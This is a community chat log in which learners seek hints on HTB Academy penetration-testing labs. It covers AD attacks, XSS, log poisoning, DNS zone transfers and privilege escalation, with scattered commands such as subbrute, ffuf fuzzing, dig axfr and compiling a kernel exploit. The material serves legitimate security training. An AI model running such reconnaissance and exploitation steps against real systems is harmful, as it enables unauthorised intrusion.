please point in the right direction for Common Services SQL "What is the password for the "mssqlsvc" user?"Nevermind. Found the mssqlsvc pass

jagged radish
cedar pawn
#

Can anyone give me a hint for the ACTIVE DIRECTORY ENUMERATION and ATTACKS final assessment part 2, I'm trying to elevate privileges and take over the SQL01, but maybe I'm overthinking.

acoustic owl
jagged zenith
#

Hey

sweet swallow
#

Hi I'm interested to cyber security community what am i doing for join this??

fading bough
#

well between all the servers this one is the softer one in bans

#

i got pelma ban in all others servers

#

and in this one a i got only 10 hours

#

.............

lyric echo
#

Hey can someone assist me with Web Service & API Assessment? I have gained asses via SOAP execute command, but am unsure if this is the correct path or where to go next..

pallid helm
#

Is there anyone out there that can offer some guidance on the HTB Academy "CROSS-SITE SCRIPTING (XSS)". Facing issues at session hijacking and skills assessment. None of the suggested payloads seem to be working (for me) and tried a variety of solutions.

pine dagger
#

Ohhhh yeah! Pivoting module down! o/

rustic sage
#

Evening! I was able to solve hard and medium assessments in Attacking Common Services without help. The Easy is the one I can't figure out. I am able to figure out to get the file or create a file with string in it and load toward to C:/xampp/htdocs directory in both method ftp and mssql. When I load the site. It get to "/N" blank and unable to load the scripts. I tried reverse-shell script and webshell script in php. Any hints ? Thanks in advance!

west canopy
fading bough
#

execution of the virus

#

that is hacking

#

putting a program in the computer and executing it

#

without alerting the anti virus

lyric echo
#

Is anyone able to help me point me in the right direction for Web Service & API Assessment? Thanks

rustic sage
sturdy igloo
#

Need help with Common Services Attacking Email. found the user. what tool to crack his password? hydra keeps stopping.

#

never mind, had to restart and then hydra worked

sage jackal
#

Windows Privilege Escalation Skills 1, I’ve gained a shell as IIS but no matter what I’ve tried I can’t find the ldapadmin password or escalate credentials… any hint ?

heady hamlet
#

So I have been beating myself up trying to solve the 2nd question Skills Assessment:Website in the Login Brute Forcing module

rustic sage
acoustic owl
brave prawn
#

Hey, working on Active Directory Attacking Domain Trusts from Linux. Need some help with dumping ntlm hashes. I really can't understand how to do it

fathom mortar
#

Hey guys, im working on Password Attacks in the Password Reuse / Default Passwords section. I dont understand what the task wants me to da

brave prawn
summer lava
fathom mortar
brave prawn
brave prawn
summer lava
#

thanks

brave prawn
#

np

fathom mortar
#

with the user found in the section before ?

brave prawn
#

1 sec. i will check this module again

fathom mortar
#

DM me please

summer lava
brave prawn
#

and you need hashcat to crack hashes, not hydra

summer lava
brave prawn
flint agate
#

Can you do the burp intruder module with zap ?

burnt stone
#

Wouldn't that defeat the purpose of doing the "burp module"?

flint agate
#

I can't fuzz with burp

#

My machine freezes

#

it takes to much time

#

I did some portswigger modules and I did some fuzzing but here it takes too much time my machine expires

pine dagger
#

Use pwnbox?

flint agate
#

it still gives you the community edition

#

anyway

#

seams like I can't complete the zap fuzzing room either : (

#

with zap

pine dagger
#

You only need community edition to do it...

flint agate
#

so I hear but I don't know

#

i let the fuzzing for 2 hours and received nothing

#

they say the response is between 200 rquests or somethin ?

pine dagger
#

I dont recall it taking that long

lapis pivot
#

Hi guys 😊.. question saying ..Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.... It should be done with Subbrute but it not working .. what to do

#

Domain name not showing anything IP also not showing

acoustic owl
lapis pivot
#

Do you mean I add this IP to the /etc/ hosts

acoustic owl
#

Add the IP to the resolvers.txt file

lapis pivot
cyan parrot
#

Anyone able to help/nudge me with skills assessment - file inclusion? I'm trying to do log poisoning and the site doesn't return the logs after correctly.

lapis pivot
#

@acoustic owl .. I have add it as you told me but still no results ... This tool not working ( Subbrute)

flint agate
#

I get the bad gateway error on the Zap fuzzing module

lapis pivot
#

@acoustic owl ./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt

acoustic owl
lapis pivot
#

This file is so big

lapis pivot
acoustic owl
#

Try it like this:
||python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt||
The file resolvers.txt contains only the target IP.

viscid furnace
#

Hi, Need some technical help in one of the modules for cbbh:
File Inclusion - Log Poisoning
Whenever I try to spawn a machine, after a min the host becomes unreachable, after retrying for a few times getting 'target failed to spawn' error in htb

hollow hinge
viscid furnace
#

Nop, barely 2-3, but doesn't matter if I send any requests or not, after a min the ip becomes unreachable, then I have to spawn another box and so on

river hornet
#

Hi all, is anyone else willing to jump of a bridge trying to solve the the Flow Control - Loop in (Intro to Bash Scripting). I have spent days on this now and want to cry!!! Iv'e added the for loop:

for i in {1..28}; do
var=$(echo $var | base64)
if [[ $i == 28 ]]; then
salt=$(echo $var | wc -c)
fi
done

I keep getting a bad decrypt error! Does anyone have any insight or ideas on this?

rugged stag
#

Someone can help me with DNS zones? I'm in the Active Subdomain Enumeration lesson (Information Gathering Web Edition Module), and I think I have a good grasp on the general concepts of DNS zones (after reading the lessons a gazillion times and doing hours of extra research on the internet), but I don't understand the application of the examples.

  • I don't understand how to find out how many zones there are
  • Because of that I don't understand when I'm in which zone
  • I don't know what exactly the zone transfer transfers form where to where (in theory yes, but not with the examples)

I can't even tell you where exactly my confusion is but after dealing with the topic for hours I still have no idea how to apply what the lesson tries to teach me.

Anyone can help me with that?

gusty plover
#

Anyone found a solution to this problem?
I'm currently in the getting started. But whenever I attempt to connect with the smbclient I get the following error:

smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

I have already tried changing the min and max protocol in the /etc/samba/smb.conf to min core and max smb3

#

It's for this one "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."

placid quest
#

@gusty plover what tool are you using

gusty plover
#

smbclient

rugged stag
#

Can I DM you?

vale salmon
hard lodge
#

Can I get helpon the skill assessment of Pivoting, Tunneling, and Port Forwarding? 🙂

tepid hemlock
#

Has anyone (or is taking) the Pentester or Bugbounty courses?

#

I am wondering which one to go and would like some input about your personal experience with it

wanton anvil
#

anyone can help me with linux privelege escalation?

tepid hemlock
wanton anvil
#

i need help with kernel exploit

tepid hemlock
#

Sure, but what is the actual problem?

wanton anvil
#

I cant complile the kernel

#

I copy the exploit from a site and then load it up a txt

#

gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit

#

used this command and i keepgetting errors

tepid hemlock
#

Ok, so what are the errors?

wanton anvil
#

the errors are saying something is wrong with the code

tepid hemlock
#

Try download the file, instead of copying the text, maybe you copied something wrongly

#

otherwise upload the thing you copied to pastebin or something and share it

#

It seems they have a "Copy To clipboard" button too

wanton anvil
#

thats what I used

tepid hemlock
#

but either way, show the error

#

as it is exactly shown to you

wanton anvil
#

how do i upload img

tepid hemlock
#

use some screenshot tool

#

on Windows you can use Snippet (if you are running linux in a virtual machine)

wanton anvil
#

im talking about into this chat. its not giving me option to

tepid hemlock
#

ah, maybe it is a rank problem

#

to prevent spam and such, maybe you need to approve yourself with the bot so you get the beginner rank

placid quest
#

@wanton anvil what is the problem withe exploit

wanton anvil
#

cant compile the kernel

tepid hemlock
#

it is not the kernel you are compiling, but the script that you download

wanton anvil
#

yes what he said

tepid hemlock
#

you use the gcc command to compile the code (make it ready to be used)

#

and then with the chmod +x you tell your computer "You can run this piece of code, it has the proper rights"

#

you turn it into something that can be run on the computer

#

but it is difficult to help you without telling us what the error is exactly

#

it could be 1 of 1000000 things 😄

wanton anvil
#

i sent you screenshot @tepid hemlock

jagged radish
lyric echo
#

Hey Guys, can someone help me out with the Web Services & API module assessment? been stuck on it for a while now

tepid hemlock
#

Where are you pinging it from @jagged radish ?

jagged radish
#

firefox

#

it says to open firefox and to see what happens ig

#

im using the workstation provided @tepid hemlock

tepid hemlock
#

I am not sure, I would try check to see if the docker container is even running

tepid hemlock
#

That part you can google, just google how to check if docker container running

wide river
#

hi im working on Footprinting MSSQL and already got inside SQL. but i dont know what command to see what information i need to get for this question, can you guy help? thank youuu

tepid hemlock
#

Hey Timo, the keyword is the "non-default database" google on that a bit

lethal widget
#

Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine

tepid hemlock
#

try run it as sudo

rustic sage
#

i will hack you 😈

feral stump
#

Though

lethal widget
high totem
#

Hey, I'm doing Getting Started module (Privleges Escalation rn) and cannot save anything on the pwnbox machine. How can I save a file there? Neither vim nor editor are not working

high totem
west canopy
storm dagger
#

By default on the pwnbox you're in /root and won't have permission to write without sudo

feral stump
#

You should though I normally use vim

high totem
#

I was in /root/Desktop instead of ~/Desktop

#

Thank you everyone 🙂

lethal widget
#

Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine
Anyone>?

strong tide
wide river
#

My problem solved, thanks guys

brave prawn
#

someone knows how can i leave this window on hackthebox machine?

storm dagger
brave prawn
west canopy
brave prawn
queen hatch
#

Windows Key (or special key) + L usually locks the screen. Maybe that combo triggered

queen hatch
#

I'm not sure what your current setup is but in the future you could use the VPN setup. You'd be responsible for downloading and setting up the tools on your own PC though.

https://academy.hackthebox.com/vpn

storm dagger
#

Update your user_init to uninstall the lockscreen on the pwnbox :D

fading bough
#

hackthebox a page with hackeable labs

#

about to test it in couples days

brave prawn
woeful oxide
#

Hey Guys

#

I'm stuck at the Broken authentication - predictable reset token

#

Following the instructions and using the php code that is there I'm no even able to get the same hash as the htbuser

raven cairn
#

DOS me with LOIC

flat silo
#

I'm on the web proxy module I need to enable a button on a response I can see its working and the hint says it won't give the flag on the first click. I've tried to send it to the repeater in zap but only get the request and can't modify the response ti enable the button like I can with zap what am I supposed to do

visual snow
#

x.x

lyric echo
#

Can someone please help me out with the Web Service and API assessment?

fading bough
#

hacking for me is littler hard

#

i have 10 years trying to hack

#

and i never get to hack a shit

west canopy
#

can you teach me to hack??

candid summit
#

Hello someone can help me with a hint in the Skill Assessment - Broken Authentication? I have some information (credentials)

west canopy
candid summit
west canopy
#

where xx ||is a country code||

candid summit
#

i found the way to decode the cookie i miss the ":" is the key jejeje

candid summit
waxen rampart
#

Hi guys, I'm stuck on the CROSS-SITE SCRIPTING (XSS) Session Hijacking module. Any advice or step to complete the activity in the pwnbox.... :'v

cedar pawn
#

Hello, can anyone give a hint for the module AD Enumeration & Attacks - Skills Assessment Part II, to do the priv esc for the MS01 , Do I need to use some the creds from previous question (SQL01)?

heady hamlet
#

Still working on the Brute Force Login, 2nd assessment and I found out that by reading the hint for the 1st question is correct. I ran it through Metasploit and got a correct hit

autumn pilot
acoustic owl
vital adder
#

and if you are wondering yes google.com is the best hacking site

feral stump
unreal latch
#

I'm stack on that task , help me please . Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11). i used as the answer \x00\x09\x20\x67 not working

loud sapphire
#

stupid issue i am having. its probably something stupid.
cant Ffuf for sub-domains/vhosts anymore.....

I have refreshed the servers many times over but no joy.

Add given IP minus the port to hosts file.
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'

Fuff command:
ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://FUZZ.academy.htb/ -H 'host: FUZZ.academy.htb'

All i get is errors........................ help please?

loud sapphire
#

fixed. Upper case error haha. Thanks all.

flint agate
#

Why do I get connection refuzed erorrs on zap intruder module ?

loud sapphire
flint agate
#

no

#

until now evertyhing was fine

#

I used the provided parrot os and ping it

#

still dosen't work

loud sapphire
#

i would refresh the server IP personally just to see. everytime this has happens to me this method fixes it.

flint agate
#

i hope it work at some moment

#

it says bad Gateway

loud sapphire
flint agate
#

ok

rustic sage
#

not a academy-module, but a burning question:

  • there is a server, only port 21 ftp open
  • i have found the root password
  • BUT i need the local user password
  • got the shadow& passwd, but there are no hashes of the users. only root.

--> How to get passwords/hashes of the other users 😮 ?

pine dagger
#

if its authing against a remote server, there wouldn't be hashes I believe.

rustic sage
#

Somehow... there must be a way, so that i can answer the question

#

already tried to get a reverse shell by changeing the crontab file, no success.

placid quest
#

@rustic sage did you look in /etc/shadow file

rustic sage
#

sure. downloaded shadow + passwd,
did "john unshadow" and tried to crack it. no success, of course, because there are no password hashes in the unshadow file.

pine dagger
#

did you actually look at the shadow file to see if there are hashes?

#

From that description, it could equally be that john failed to crack the hashes

rain glen
rustic sage
#

kevinsmith:!:16497:0:99999:7:::

#

! instead of hash, thats happens if user is locked/ no password given.

Still dont know how i can answer the question, "whats his password? choose a, b, or c"

balmy yoke
#

Hello Guys
i try to solve the
Shells and Payloads Lie Engagement part

I have to use the noMachine programm but i get every 20 seconds or 3 comands a timeout : (
I tried to change the vpn connection but the Issue is still there

flint agate
#

I can't get a connection to the IP from the Zap fuzzing module

#

I am now using the pwnbox

#

On my local device is the same even with their VPN

wide torrent
#

on the "Active Infrastructure Identification", i am stuck on where to add the vhosts. if anyone could give me a hand would be greatly appreciated

flat silo
#

I'm on the web proxy assessment I've found how to enable the button but the hint says I need to make it so the button can be clicked multiple times I'm a little lost on how to accomplish that can anyone just point me in a direction to look in?

acoustic owl
edgy ridge
brave prawn
#

Hey, can someone help with Active Directory Assignment 1 last question?

leaden quail
#

hey guys, how i can send commands to the ftp server in the pwnbox

#

got this wired 200,150,226 message

placid quest
#

@leaden quail maybe that person has no access

outer mango
#

Anyone indian plz inbox me

acoustic owl
flint agate
#

Problem solved for me ☺️
Just but the IP in the normal browser not in the proxy

brave prawn
lyric echo
#

hey can anyone help me with Wordpress structure, finding the flag using directory traversal? I feel like i've looked in every directory and still no flag

acoustic owl
lyric echo
#

hey can anyone help me with Wordpress structure, finding the flag using directory traversal? I feel like i've looked in every directory and still no flag

zenith forge
#

hi, I'm newer here.

outer mango
#

Plz help me htb plz provide free acount I share my tryhackme acount 7month premium subscriptions

storm dagger
lapis pivot
#

@west canopy.. please help me .. I got stuck in one MFFFF Question for two days now

#

This MF

Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

steep loom
#

Is there a general channel somewhere or am I crazy? I just want to thank the HTB academy team for their hard work. The level of training being provided is leagues ahead of anything else I have see as a beginner in the field and am extremely thankful. ❤️

placid quest
#

@lapis pivot do zone transfer

lapis pivot
lyric echo
#

Has anyone here completed the hacking wordpress module?

hard lodge
#

Hey, could i DM someone about the last question of the Skills Assessment of Pivoting, Tunneling, and Port Forwarding module? I feel i'm really close but something's missing...

long crypt
#

Hey, I'm doing the Windows Fundamnetals skill assessment and I got the last two questions right by swapping the user SID for the group SID and vice versa

#

I'm not sure if I did the steps wrong or if the questions are wrong

lyric echo
# lethal atlas yes

hey sk4reKr0w, thanks for responding, I'm stuck on the Wordpress structure /file structure section. I believe I have checked all the core directories and there content, but still have not see the flag.txt

lethal atlas
#

there are no questions in that section. Unless they updated it

woeful oxide
#

someone knows how to use time verter?

lyric echo
#

@lethal atlas hey coincidentally I JUST found the flag. But I appreciate the response..

lethal atlas
woeful oxide
#

yup it's a tool made to crack reset tokens

#

maybe it's useful for someone

lapis pivot
placid quest
#

@lapis pivot do on internal.inlanefreight.htb

lapis pivot
#

Add internal?

placid quest
#

@lapis pivot use dig axfr internal.inlanefreight.htb ip address

lapis pivot
#

@placid quest I used dig AXFR internal.inlanefreight.htb 10.129.186.211

nothing happened

lime moth
#

I was stuck at the exact same question hehe

lapis pivot
#

It saying transfer failed

lime moth
#

dig axfr internal.inlanefreight.htb @rustic sage

#

do @10.129.186.211

lapis pivot
lapis pivot
#

@lime moth okay I will try

lime moth
# lapis pivot It MF question

Hehe i know. Since the internal.inlane blabla is not showing up when bruteforcing subdomains with a wordlist that contains the word "internal"

woven copper
#

@lime moth please no spoiler , you guys can continue on DM

lime moth
#

Ah sorry!

#

Removed it 🙂

summer lava
#

having little problem getting 'sam' password / PASSWORD ATTACK MODULE

 Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
haughty jay
#

do you already have the cookie?

#

pm

silk ocean
#

anyone finished the documenting and reporting module? I'm stuck on the part where it asks what keybinds are used in TMUX to split panes vertically

#

even though I know it lol and match the format they ask for lol

#

apparently its supposed to be like [key] + [key] + [key] where you replace key. but it doesn't work for me. not sure why

strange silo
#

Hi @spare condor , could you solve it? I got the same issue

sturdy igloo
#

anyone completed common services easy that i can get some help from? i have uploaded php shell to the portal via the upload function but clueless after that

west canopy
pearl thorn
#

Hey guys, I am stuck in the broken authentication module in predictable reset token question 2. I found the encoding algorithm for htbuser but I don't know what to do next and how to request a reset token for htbadmin to force a password change.

#

NVM guys, I got it. It's very easy.

raven cairn
#

It is super annoying

lyric echo
#

Can someone help me out with Hacking Wordpress assessment. I have the flag for all questions except "Use a vulnerable plugin to download a file containing a flag via an unauthenticated file download".

rustic sage
#

Hello, I was wondering if someone could give me some hint about ||what to do with the ability to perform log poisoning in the last question of the File Inclusion module? I have been stuck at it because my payload gets detected by probably a firewall of some sort, but I tried to encode the payload in base64. It works, the base64 code is added to the log file, but how could I execute it next? I have also tested URL encoding the payload but that didn't work out|| Module: File Inclusion

vital adder
vital adder
rustic sage
#

|| Whenever I send the payload in the User-Agent header (I also tried other headers just in case), the file is blocked and new input is ignored ||

#

||I just tried sending it with single quotes and the result is the same, that's why I assume there's a firewall||

vital adder
#

which log file did you try to inject?

rustic sage
#

|| access.log located in /var/log/nginx ||

vital adder
vital adder
#

can you send me a screenshot of your payload in burp?

rustic sage
#

Sure, wait a second

woeful oxide
#

Hey Guys

#

Can I get a hand with the broken authentication - Cookie Brute-forcing

#

I got my script ready and tried many different lists, the only hint I got for the ||role|| is super admin

#

Tried many lists from seclists and even used cupp to get another list

rustic sage
vital adder
#

@woeful oxide reread the question the role is in the question

vital adder
# lyric echo Thanks! I will try this!

i just with scan it with wpscan without the api it didn't find anything even with the api it only show you that cve under ||Multiple Issues|| and there are multiple cve there so i think you should just look for the vuln on exploit-db.

lyric echo
plucky rover
#

anyone can provide hint for me on "Attacking Enteprise Networks - External information gathering" - What is the FQDN of the associated subdomain? I don't quite understand the associated subdomain part - FQDN is fully qualified domain name, but not sure what is being asked

rustic sage
rustic sage
high totem
#

Hi, I'm doing the Getting Started knowldege check. However after getting reverse shell I cannot use almost any linux commands. Even id is not working. Says it unknown command. Anybody can give me a nudge why is that? I can't upgrade TTY also, because python is also unknown

high totem
#

What's funnier -> ls -l | grep something works (for prefect match) grep alone returns Unknown command: grep

plucky rover
plucky rover
high totem
plucky rover
high totem
plucky rover
#

can you check if grep is exists? ls /usr/bin/grep

#

or echo /usr/bin/grep

#

just want to make sure the path is correct (it's on /usr/bin/ on my system)

high totem
plucky rover
#

I'm not sure what happened... someone more knowledgable probabaly can help... but I suspect you are not running proper shell?

#

try to restart the reverse shell?

high totem
#

I tried restarting. I used Metasploit to get the reverse shell. Haven't upgraded TTY because I cannot run python (even though it is under /usr/bin)

#

Yeah, maybe I'll try again later

royal veldt
#

Hey guys

#

I just joined

real berry
#

can someone tell me the best place to learn networking

rustic sage
#

i get "zsh: parse error near `do'" when i copy the code given in Server-side Attack module SSRF exploitation example

#

I changed the IP for the target IP

muted delta
#

Hi all, somebody working on Linux privilege escalation module? I’ve only found flag2 and flag5 I may need a nudge

rustic sage
#

can anyone help how to get the code working?

#

copy pasting the code does not work on pwnbox or on my VM

rugged stag
#

Anyone else having problems with the File Inclusion Skill Assessment box? I have to respawn several times until it works, and if it works, it runs out of time very quickly.

clear bough
#

hey guys... i'm stucked in server side attack module in "Nginx Reverse Proxy & AJP" . i have set up nginx server as show in the module and all work without error but when i curl to my localhost i don't give the tomcat page but give my nginx page and i don't know how.... can anyone hjelp me please??

brazen saffron
#

I am doing a scan to see the version of the port 8080 but there is nothing, the module is "Getting Started" > Service Scanning.

lime moth
#

Hi all! I am so so stuck on "What is the FQDN of the host where the last octet ends with "x.x.x.203" ?" in the footprinting DNS part. Any1 that could help me out? Found the 2 transferable zones, tried to dig everything but without success.

acoustic owl
night pier
#

Has anyone finished secure coding skills assessment? I need some help with 4 reverse. I believe I have fixed what's wrong with the code but no flag.

wide torrent
#

Active Subdomain Enumeration:
I cant seem to use nslookup on the target, i get this error returned
** server can't find ....in-addr.arpa: NXDOMAIN

ornate furnace
#

Sort of Noob with Linux here, I just started the "Linux Fundamentals" module (Service and Process Managment section) and I am tring to start the ssh server. I have installed openssh-server already. When I try to start it, it is asking for a password to authenticate and I can't find the password (The Instance within the module). Where can I get it to continue? I have tried nothing and also my HTB password, and also tried to change the password but no luck. Please direct me to what I should be doing.

placid quest
#

@brazen saffron what is the problem

brazen saffron
#

Do you have the module?

#

I need to see the version but there is nothing...

wide torrent
#

for the Active Subdomain Enumeration module, has anyone has issues resolving the ip. i can ping the target but cant seem to get a response with nslookup. any advice would be greatly appreciated

wide torrent
lime moth
acoustic owl
west canopy
#

i dont think ive ever done a zone transfer with nslookup

wide torrent
#

im just following the course...

west canopy
#

yea the directions in this section are kind of unclear

#

everyone get stuck on that section. i got stuck on it haha

wide torrent
#

so dig is the answer im guessing XD

#

also how do you change the dns resolver?

west canopy
#

yep so you already did the first zone transfer, try doing|| the same thing against some of the subdomains you discovered||

#

that would be the IP address in your dig command, that stays the same

#

the IP of the DNS resolver

wide torrent
#

okk i misunderstood that

#

ill keep at it ty all for the help

west canopy
#

i probably did a terrible job of explaing as well lol

#

np let me know if you get stuck

rustic sage
#

Etc

#

Literally just any domain name with a dot

brave prawn
#

Hey, stucked on Active Directory Enumaeration & Attacks Assignment 2 question 4. Would appreciate a nudge

acoustic owl
brave prawn
brave prawn
#

thanks

plucky rover
rancid holly
#

going through the web attacks module
in Mass IODR enumeration part I have one doubt
the request that is getting passed is a post request and the uid is also visible when we check the request with burp, but unable to run script in similar way as mentioned in the resources
current command looks like
curl -X POST -s "$url/documents.php" -d '{"uid": $i}' | grep -oP "/documents.*?.txt
not sure about the -d part as it's for post data

comments?

woeful oxide
#

Send me DM

brave prawn
# acoustic owl Yes

Can I ask you what tool did you use to connect to sql server? Trying to install sqsh, but there no candidates to download. Also sqlcmd for linux, but it doesn't work with proxychains

acoustic owl
# brave prawn Can I ask you what tool did you use to connect to sql server? Trying to install ...

Do you use Parrot?
You can donwload sqsh here: https://pkgs.org/download/sqsh

Or you can use Impacket/mssqlclient.py
https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

GitHub

Impacket is a collection of Python classes for working with network protocols. - impacket/mssqlclient.py at master · SecureAuthCorp/impacket

brave prawn
pearl thorn
#

Hello guys , Does anybody know how to use grep to get all the words that start with capital letters?

pine dagger
#

Maybe grep -E '^[A-Z].*'

#

assuming a wordlist

pearl thorn
pine dagger
pearl thorn
#

cool thanks

rustic sage
#

Hello!! would anyone be willing to help me out with sql injection fundamentals module . specifically the using comments section. something is just not clicking..

strange silo
candid summit
modest token
#

Hey all, I'm stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS ACL Enumeration, last question. What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I got the other answers with bloodhound, but I think I need to run the Get-DomainObjectAcl command for this one. but it just freezes and hangs when I run the command. Could someone help me out? nvm, I figured it out. ^_^ if anyone else has a question about this one dm me.
for anyone stuck on this: so in bloodhound it's called add self, right? Try running Find-InterestingDomainAcl with the -ResolveGUIDs flag set. Stop it after a bit and start going thought the output and look for anything that might be similar to bloodhound's "add self".

rugged stag
#

I'm respawning the Skills Assessment File Inclusion machine about every two minutes now. This is so frustrating. Can somebody please fix that? 😡 😡
The minute counter goes down one minute every couple of seconds...

lime moth
#

Still stuck on "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" I tried to zone transfer and enumerate every record that I found in the 2 zones. Any1 has more tips for me?AngryPing

acoustic owl
rugged stag
#

Someone can help me a little with the Session Security Skill Assessment? I think I understand the concepts behind the module, but what I don't get is how do I get the admin user to trigger possible payloads. I know it has something to do with the API, but I have no idea how to proceed, since nothing about that is mentioned in the lectures (except from "think outside the box" haha, very helpful).
Anyone can give me a nudge where to start? Everything I tried with the strategies from the lessons seems to be a dead end.

dark juniper
#

Hallo, I stuck in the last question of Linux Fundamentals,

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
Did anyone can help me please?

brave prawn
#

Hey, what CLSID do we need to use to exploit ||JuicyPotato|| in Active Directory Enumeration and Attacks module Assignment 2?

mild orbit
#

Hey, i'm having issue to submit answer in Network Enumeration with Nmap for the medium lab, can someone help me ? 😁

lethal atlas
brave prawn
lethal atlas
#

Has anyone done the Intro to Assembly Language module?

#

I am stuck on the skills assessment. I have pulled the shellcode from the file, decoded as 32bit but I dont recognize some of the commands being used.

lethal atlas
#

** listening to the crickets lol

raven cairn
#

I can maybe try to help

#

I’m pretty busy today tho

#

It is a fun module

thorny stag
#

Boa tarde a todos

lethal atlas
#

if you could just point me in the right direction.

#

I have decoded it as 32 bit and 64 bit. Which way is correct? In 32bit I see a bunch of commands I dont recognize

iron basin
#

Anyone have any hints or recommendation on the DNS section of the footprinting module? Stuck on the last question where you have to find the FQDN of a certain IP.

flat silo
#

I'm on the web proxy assessment the third flag says to take the decoded cookie from the last question then try and fuzz for the last character. I'm pretty sure I have the setup right bc I'm getting the 88 characters and it looks like the original request cookie but I've tried all 62 outputs and get wrong answer for all of them can anyone help me out do I need to run those results through an MD5 hash to submit them

lethal atlas
loud sapphire
#

im being dumb again>>>>

Linux Privilege Escalation - Privileged Groups.

Can i DM someone a question about this please? Contains a potential spoiler so i dont want to ask it in public.... im lost af.

iron basin
#

Hey, any reason why nslookup wont work trying to find a nameserver but dig will?

lethal atlas
#

depends on how you have the command crafted

lethal atlas